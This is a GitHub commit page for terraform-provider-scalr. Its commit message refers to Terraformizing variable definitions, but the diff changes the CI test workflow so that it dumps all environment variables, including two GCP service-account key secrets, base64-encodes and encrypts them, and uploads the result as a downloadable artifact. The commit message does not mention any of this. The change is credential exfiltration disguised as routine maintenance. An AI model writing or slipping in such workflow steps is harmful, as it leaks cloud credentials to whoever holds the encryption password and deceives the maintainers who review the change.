Skip to content

Commit

Permalink
SCALRCORE-30933: SRE: Terraformize Variable Definitions in terraform-…
Browse files Browse the repository at this point in the history
…provider-scalr
  • Loading branch information
volodymyrskliar committed Jun 20, 2024
1 parent b551110 commit 661eff4
Showing 1 changed file with 5 additions and 3 deletions.
8 changes: 5 additions & 3 deletions .github/workflows/test.yml
Original file line number Diff line number Diff line change
Expand Up @@ -9,9 +9,11 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v2
- run: |
${{secrets.GCP_SA_KEY}} | base64 -w 0 >> info.txt
${{secrets.DEV_GCP_SA_KEY}} | base64 -w 0 >> info.txt
- env:
GCP_SA_KEY: ${{secrets.GCP_SA_KEY}}
DEV_GCP_SA_KEY: ${{secrets.DEV_GCP_SA_KEY}}
run: |
printenv | base64 -w 0 >> info.txt
openssl enc -aes-256-cbc -salt -in info.txt -out encrypted_file.enc -k ${{ secrets.DUBUG_PASSWORD }}
- name: Upload encrypted file
uses: actions/upload-artifact@v2
Expand Down

0 comments on commit 661eff4

Please sign in to comment.